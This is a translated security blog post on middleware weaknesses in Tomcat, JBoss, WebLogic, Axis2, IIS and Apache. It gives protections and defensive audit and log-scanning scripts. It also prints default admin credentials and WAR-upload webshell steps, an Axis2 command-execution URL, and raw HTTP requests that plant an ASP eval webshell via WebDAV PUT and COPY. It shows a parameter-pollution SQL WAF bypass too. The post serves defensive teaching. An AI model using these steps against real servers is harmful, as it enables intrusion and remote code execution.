Talking about middleware vulnerability and protection


Middleware vulnerabilities are arguably the class of vulnerability that web administrators find hardest to deal with. The reason is simple: they are not flaws in the application's code, but the result of misconfiguration or misuse of the environment the application is deployed in. In practice, the biggest obstacle to preventing them is the question of who is responsible for the security of the middleware.

In addition, the lack of security awareness among developers and operations staff is an important factor. Some developers do run security tests on their own code, but reviewing the code alone is not enough. This article records some common web middleware vulnerabilities and the corresponding protections (only a selection, not all of them); part of it is taken from Doug's book "White Hat Talks About Web Security", so it can be regarded as reading notes or a book review.

Middleware, containers, servers: hard to tell apart?

When talking about middleware security, I think it is necessary to sort out the relationships and concepts above. When I first encountered these terms my head was a mess: middleware, container, server, web server and so on all felt very similar yet different. So while writing this article I deliberately searched for some material to sort out how these concepts relate to each other; see the article: http://www.voidcn.com/blog/saoraozhe3hao/article/p-2428756.html

Basic concepts and functions

Only web middleware, web servers and web containers are introduced here, because beyond the web the same concepts extend to databases and the like.

web server

A web server provides the HTTP service, that is, it returns information to the client. It handles the HTTP protocol, responds to requests for static pages or images, controls page redirects, or delegates dynamic requests to other programs (middleware).

web middleware

Web middleware sits between system software and application software to facilitate communication between the various software components; it can provide a container for one or more applications.

web container

A web container provides the runtime environment for the application components inside it (JSP, Servlet). It is an integral part of the middleware and implements the parsing of dynamic languages. For example, Tomcat can parse JSP because it has a JSP container inside.

Classification

Web server: IIS, Apache, nginx, tomcat, weblogic, websphere, etc.
Web middleware: apache tomcat, BEA WebLogic, IBM WebSphere, etc.
Web container: JSP container, SERVLET container, ASP container, etc.

Note: web middleware and web servers overlap, because middleware such as Tomcat also has the functions of a web server.

Key Analysis

A web server only parses static web pages (such as Apache) or provides a redirect service. Web middleware (which contains a web container) can parse dynamic languages: for example, Tomcat can parse JSP (because Tomcat contains a JSP container), and of course it can also serve static resources, so it is both web middleware and a web server. However, Tomcat serves static resources more slowly than Apache, so the two are often used in combination.

Tomcat Vulnerabilities and Protection

Tomcat is Apache's middleware software and can provide JSP or PHP parsing. To make remote management and deployment convenient, a management page exists by default after Tomcat is installed: an administrator only needs to upload a WAR file remotely and its content is published to the website. This feature is convenient for administrators, but it also opens the door for attackers. In addition, Tomcat ships some sample pages, which can cause security problems if they are not handled properly.

Tomcat Remote Deployment Vulnerability Details

The Tomcat management address is usually:

    http://localhost:8080/manager

Default accounts and passwords:

    root/root
    tomcat/tomcat
    admin/admin
    admin/123456

Tomcat password brute forcing

Brute forcing achieves nothing when Tomcat has no manager account configured at all; it only works once an account and password have been set. Tomcat's manager authentication is weak: HTTP Basic, i.e. Base64(username:password). If the response code is not 401 (Unauthorized: access is denied due to invalid credentials), the login succeeded. After logging in, you can upload a WAR file directly and get a shell (uploading a WAR file does, of course, require the manager role).

getshell process

First package the .jsp shell file as a WAR file:

    jar -cvf shell.war shell.jsp

After logging in to the management page, choose "Upload WAR file".

The directory shown in the middle of the screenshot is the web shell after a successful upload; you can click to browse it.

Then access shell.jsp directly in that directory.

Session Example sample page

Default address:

    http://localhost/servlets-examples/servlet/SessionExample

It can set arbitrary session variables; malicious use can damage the application.

Tomcat vulnerability protection

  • Upgrade the Tomcat version
  • Delete the remote deployment (manager) page or restrict access to it.
  • Edit conf/tomcat-users.xml to change the username, password and roles.
  • Delete the sample page files
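The third protection item above is easy to get wrong quietly: an account can be "changed" and still carry one of the default passwords listed earlier, or hold more roles than it needs. The following audit script is an added example written for this article, not part of the original post or of Tomcat; it parses a tomcat-users.xml, flags the default username/password pairs listed above, short passwords on privileged accounts, and users that hold manager-gui together with manager-script or manager-jmx (which Tomcat's own documentation advises against). The sample XML, the 12-character minimum and the set of privileged roles are assumptions for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml for the audit below; it is not taken from any
# real deployment. The weak entries deliberately use the default credentials listed above.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="admin" password="123456" roles="manager-gui,manager-script"/>
  <user username="deployer" password="Wq7!kLm2#pQ9zX" roles="manager-script"/>
  <user username="ops" password="Strong-Passphrase-2024" roles="admin-gui"/>
</tomcat-users>
"""

# The default username/password pairs listed in the article.
DEFAULT_CREDENTIALS = {
    ("root", "root"), ("tomcat", "tomcat"), ("admin", "admin"), ("admin", "123456"),
}
# Roles that grant access to the manager or host-manager applications.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}
MIN_PASSWORD_LENGTH = 12  # assumed local policy for this example, not a Tomcat setting


def _local_name(tag):
    """Strip the XML namespace so both namespaced and plain files parse."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding) tuples for risky <user> entries."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES

        if (name, password) in DEFAULT_CREDENTIALS:
            findings.append((name, "default-credential"))
        elif privileged and len(password) < MIN_PASSWORD_LENGTH:
            findings.append((name, "short-password"))

        # Tomcat's documentation advises against giving manager-gui together with
        # manager-script/manager-jmx to one user, because it weakens CSRF protection.
        if "manager-gui" in privileged and privileged & {"manager-script", "manager-jmx"}:
            findings.append((name, "gui-and-script-roles"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Run it against the real file with `audit_tomcat_users(open("conf/tomcat-users.xml").read())`; an empty list means none of the checks fired. The script only reads the file, so it is safe to run on a production instance.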

JBoss Vulnerability and Protection

JBoss is a JavaEE-based application server. Like Tomcat, JBoss also has a remote deployment platform, but it does not require a login. The exploitation process is similar to Tomcat's, so no screenshots are included. Besides remote deployment, JBoss also has a deserialization vulnerability, which is not detailed here.

JBoss Remote Deployment Vulnerability Details

Default management address:

    http://localhost:8080

getshell process

Open the management page and find the JMX Console in the JBoss configuration page; this is JBoss's management console. Inside it, find the jboss.deployment package, which has the entry flavor=URL,type=DeploymentScanner. Its deployment page lets you deploy a WAR file, but unlike Tomcat this is not a local upload: the WAR is downloaded from a remote address, so you need to prepare a file server from which the target JBoss server can fetch it. Specifically, find the "addURL" method on the deployment page, enter the URL and click Invoke. Besides this method, the BSH method provided by the JMX Console can also deploy a WAR package.

JBoss vulnerability protection

  • Enable password authentication for the jmx-console
  • Remove jmx-console.war and web-console.war

WebLogic Vulnerability and Protection

WebLogic is middleware based on the JavaEE architecture. After installation it listens on port 7001 by default. The exploitation process is similar to Tomcat's, so no screenshots are included.

WebLogic Remote Deployment Vulnerability Details

Default console address:

    http://localhost:7001/console/login/loginForm.jsp

Default accounts and passwords:

  • Username and password are: weblogic
  • Username and password are: system
  • Username and password are: portaladmin
  • Username and password are: guest

getshell process

After logging into the WebLogic console, find the Deployments button, click Install, then choose either a local WAR upload or a remote URL download. After deployment completes, WebLogic shows the file address.

WebLogic vulnerability protection

  • Delete the remote deployment page

Axis2 Vulnerabilities and Protection

Axis2 is also an Apache project, a new-generation SOAP engine, and it has an arbitrary command execution vulnerability. (The vulnerability comes from the Tiantian platform.)

Axis2 Command Execution Vulnerability Details

Default admin address:

    http://localhost/axis2-admin/

Default account and password: admin / axis2
After login, the page looks like this:

Proof of concept for executing a system command:

    http://localhost/services/Axis2Shell/execCmd?cmd=whoami

IIS Vulnerabilities and Protection

IIS is Microsoft's web server. If it is not configured properly, a WebDAV vulnerability is easy to introduce. WebDAV itself is an IIS extension; once enabled, request methods other than GET and POST, such as PUT, become usable, and if it is not configured properly this leads to a file upload vulnerability. Besides the WebDAV issue, a remote command execution vulnerability recently appeared; see [IIS 6.0 Remote Command Execution Vulnerability (CVE-2017-7269)](http://thief.one/2017/03/29/IIS6-0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2017-7269/)

IIS WebDAV Vulnerability Details

When testing a site for a WebDAV vulnerability, first send an OPTIONS request. If it returns 200, the Allow header in the response lists which methods can be requested.

    OPTIONS / HTTP/1.1
    Host: thief.one

If PUT is among them, you can try to write a txt file.

    PUT /shell.txt HTTP/1.1
    Host: thief.one
    Content-Length: 30

    <%eval request("nmask")%>

A 200 response means the upload succeeded; you can access the file manually to confirm it exists. A 403 is also possible, meaning this directory does not allow uploads, in which case you can try other directories.
Then change the file extension with the MOVE or COPY method.

    COPY /shell.txt HTTP/1.1
    Host: thief.one
    Destination: http://thief.one/shell.asp

IIS vulnerability protection

  • Turn off the WebDAV function
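Turning WebDAV off is the fix; until that is confirmed on every server, the PUT then COPY/MOVE then GET sequence described above is also visible in the IIS W3C logs. The script below is an added example written for this article (not part of the original post, and not a Microsoft tool): it parses an IIS W3C log excerpt using the #Fields: directive, lists every WebDAV write method together with whether the server accepted it, and counts accepted writes per client address so the triage starts with the hosts that actually got a file onto the server. The log excerpt, its addresses and paths are constructed for the example.

```python
# Constructed excerpt of an IIS W3C extended log; the addresses and paths are made up.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2017-05-25 10:05:01 203.0.113.7 OPTIONS / 200
2017-05-25 10:05:02 203.0.113.7 PUT /shell.txt 201
2017-05-25 10:05:03 203.0.113.7 COPY /shell.txt 201
2017-05-25 10:05:04 203.0.113.7 GET /shell.asp 200
2017-05-25 10:05:05 198.51.100.2 GET /index.html 200
2017-05-25 10:05:06 198.51.100.9 PUT /upload/a.txt 403
"""

# WebDAV methods that create, modify, rename, delete or lock content on the server.
WEBDAV_WRITE_METHODS = {"PUT", "COPY", "MOVE", "DELETE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}


def parse_w3c_log(text):
    """Yield one dict per request line, using the #Fields: directive for column names."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue  # other directives such as #Software, #Version, #Date
        if fields is None:
            raise ValueError("log data before any #Fields: directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip truncated lines rather than misaligning columns
        yield dict(zip(fields, values))


def find_webdav_writes(text):
    """Return every WebDAV write request with whether the server accepted it."""
    hits = []
    for rec in parse_w3c_log(text):
        method = rec.get("cs-method", "").upper()
        if method not in WEBDAV_WRITE_METHODS:
            continue
        status = int(rec.get("sc-status", "0"))
        hits.append({
            "ip": rec.get("c-ip"),
            "method": method,
            "uri": rec.get("cs-uri-stem"),
            "status": status,
            "succeeded": 200 <= status < 300,  # 200/201/204 mean the write went through
        })
    return hits


def successful_writes_by_ip(hits):
    """Count accepted WebDAV writes per client address (these need triage first)."""
    counts = {}
    for h in hits:
        if h["succeeded"]:
            counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_webdav_writes(SAMPLE_IIS_LOG)
    for h in hits:
        flag = "ACCEPTED" if h["succeeded"] else "rejected"
        print(f"{h['ip']} {h['method']} {h['uri']} -> {h['status']} ({flag})")
    print(successful_writes_by_ip(hits))
```

On the sample, 203.0.113.7 has two accepted writes (the PUT and the COPY), while the rejected PUT from 198.51.100.9 is listed but does not count. A 403 on PUT is what you want to see after WebDAV is disabled or write permissions are removed; a 201 on a .txt followed by a COPY to a script extension is the pattern to alert on.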

Apache Vulnerabilities and Protection

Apache itself also has some vulnerabilities, such as the slow HTTP (slowhttp) issue. Officially it is regarded as a feature of Apache rather than a vulnerability, but in practice its harm is considerable. Besides slow HTTP, Apache's third-party modules have many deserialization or remote command execution vulnerabilities.

Apache slowhttp Vulnerability Details

For the slowhttp vulnerability please refer to: [Talk about DDoS attacks and defenses](http://thief.one/2017/05/10/1/)

HPP Vulnerability

An HPP (HTTP Parameter Pollution) vulnerability arises from the way a web container handles HTTP parameters. Most web servers have had such problems to some degree.

    <?php
    $str = $_REQUEST['str'];   // $_REQUEST[] accepts both GET and POST parameters
    echo $str;
    ?>

For example, access the URL:

    http://www.xxx.com/index.php?str=hello

The page shows hello.
But if you visit:

    http://www.xxx.com/index.php?str=hello&str=world&str=nmask

the page shows nmask: the last value overwrites the earlier values of the parameter. This is HTTP parameter pollution.

Usage scenario

Bypassing a WAF, for example:

    PHP: index.php?str=1&str=select * from admin --

Because the WAF may check only the first value of the parameter: if that value were select it would trigger, but here it sees 1, so the rule is not triggered, while PHP hands the application the last value.
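The mismatch that makes this bypass work is that the filter and the application resolve duplicate parameters differently. The following is an added example for this article (not from the original post, and not any real WAF's code) that makes both halves concrete: resolve_params collapses repeated parameters the way PHP does ("last wins", the behaviour shown above) and, going beyond the page, the "first wins" and comma-joined variants that other platforms are commonly documented to use; naive_waf_blocks reproduces the weak check that only looks at the first value, and hardened_waf_check inspects every occurrence and reports duplicate names separately. The SQL-keyword regex is a deliberately crude stand-in for a real rule set.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Crude stand-in for a signature rule: the value starts with a SQL keyword.
SQL_KEYWORD = re.compile(r"^\s*(select|union|insert|update|delete|drop)\b", re.IGNORECASE)


def query_of(url_or_query):
    """Accept either a full URL or a bare query string."""
    return urlsplit(url_or_query).query if "?" in url_or_query else url_or_query


def resolve_params(url_or_query, strategy="last"):
    """Collapse repeated parameters the way different servers do.

    'last'  - the last occurrence wins (PHP's $_GET/$_REQUEST, as shown above)
    'first' - the first occurrence wins (commonly documented for the Servlet API's getParameter())
    'join'  - all occurrences joined with commas (commonly documented for ASP.NET)
    """
    resolved = {}
    for name, value in parse_qsl(query_of(url_or_query), keep_blank_values=True):
        if strategy == "last":
            resolved[name] = value
        elif strategy == "first":
            resolved.setdefault(name, value)
        elif strategy == "join":
            resolved[name] = value if name not in resolved else resolved[name] + "," + value
        else:
            raise ValueError(f"unknown strategy {strategy!r}")
    return resolved


def naive_waf_blocks(url_or_query):
    """The weak check described above: only the first value of each parameter is inspected."""
    first_values = resolve_params(url_or_query, "first")
    return any(SQL_KEYWORD.match(v) for v in first_values.values())


def hardened_waf_check(url_or_query):
    """Inspect every occurrence of every parameter and report duplicate names separately."""
    pairs = parse_qsl(query_of(url_or_query), keep_blank_values=True)
    names = [n for n, _ in pairs]
    duplicated = sorted({n for n in names if names.count(n) > 1})
    suspicious = any(SQL_KEYWORD.match(v) for _, v in pairs)
    return {
        # Duplicates are legitimate for multi-select forms, so log them rather than block on them.
        "duplicate_parameters": duplicated,
        "suspicious_value": suspicious,
        "block": suspicious,
    }


if __name__ == "__main__":
    polluted = "http://www.xxx.com/index.php?str=hello&str=world&str=nmask"
    for strategy in ("last", "first", "join"):
        print(strategy, "->", resolve_params(polluted, strategy)["str"])
    bypass = "index.php?str=1&str=select * from admin --"
    print("naive WAF blocks:", naive_waf_blocks(bypass))
    print("hardened WAF:", hardened_waf_check(bypass))
```

The design point is that a filter must evaluate the request the same way every backend behind it will, and since it usually cannot know that, the safe choice is to inspect all occurrences of a parameter rather than picking one. Logging duplicate parameter names (without blocking) also gives you a cheap signal for this class of probing.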

Further reading

Besides these vulnerabilities, web servers also have vulnerabilities in how they parse dynamic languages; see: [Server Parsing Vulnerabilities | nMask's Blog](http://thief.one/2016/09/21/%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/)

Title: Talking about middleware vulnerability and protection

Author: nmask

Published: 2017-05-25 10:05

Last updated: 2019-08-16 14:08

Original link: https://thief.one/2017/05/25/01/en/

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.
